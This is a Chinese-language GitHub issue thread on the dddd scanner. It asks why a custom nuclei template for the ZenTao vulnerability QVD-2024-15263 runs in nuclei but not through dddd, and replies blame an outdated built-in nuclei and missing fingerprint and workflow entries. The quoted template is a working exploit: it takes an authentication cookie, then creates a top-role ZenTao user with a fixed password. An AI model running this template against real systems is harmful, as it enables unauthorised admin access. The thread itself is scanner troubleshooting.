大佬，自己加的有的yaml怎么无法nuclei扫到呢，是不是内置nuclei太老了。用nuclei可以扫到，但是用dddd加nucleiyaml就不行。

ljlsec commented 1 month ago

大佬，自己加的有的yaml怎么无法nuclei扫到呢，是不是内置nuclei太老了。用nuclei可以扫到，但是用dddd加nucleiyaml就不行。 yaml如下

`id: chandao-QVD-2024-15263

info: tags: chandao-QVD-2024-15263 name: chandao-QVD-2024-15263 author: github severity: high description: |- fofa: title="Login - ZenTao", app="易软天创-禅道系统"

variables: account: '{{rand_base(6)}}' password: 'Admin123@'

http:

raw:
- | GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1 Host: {{Hostname}}
- | POST /zentao/api.php/v1/users HTTP/1.1 Cookie: {{cookie1}} Host: {{Hostname}}
  
  {"account": "{{account}}", "password": "{{password}}", "realname": "{{account}}", "role": "top", "group": "1"}
- | POST /zentao/api.php/v1/users HTTP/1.1 Cookie: {{cookie1}} Host: {{Hostname}}
  
  {"account": "{{account}}", "password": "{{password}}", "realname": "{{account}}", "role": "top", "group": "1"}
extractors:
- type: kval name: cookie1 part: header_1 internal: true kval:
  - Set_Cookie
- type: json part: body_2 json:
  - .account
matchers:
- type: word part: body words:
  - "\u300e\u7528\u6237\u540d\u300f\u5df2\u7ecf\u6709\u300e"`

worlflow这样写

易软天创-禅道系统: type:

root
dir pocs:
CNVD-2022-42853
Tags@chandao-QVD-2024-15263

otbox1 commented 1 month ago

我也碰到了，加了指纹和工作流，也识别不到

ljlsec commented 4 weeks ago

我也碰到了，加了指纹和工作流，也识别不到

这是nuclei太老了，不支持3.3语法

cixoo commented 1 week ago

首先，你要先在finger.yaml里面加上指纹，然后再把workflow.yaml里面加上指纹名称和对应的poc，就可以扫到了。

多去熟悉一下finger.yaml和workflow.yaml就知道规律了

SleepingBag945 / dddd

大佬，自己加的有的yaml怎么无法nuclei扫到呢，是不是内置nuclei太老了。用nuclei可以扫到，但是用dddd加nucleiyaml就不行。 #85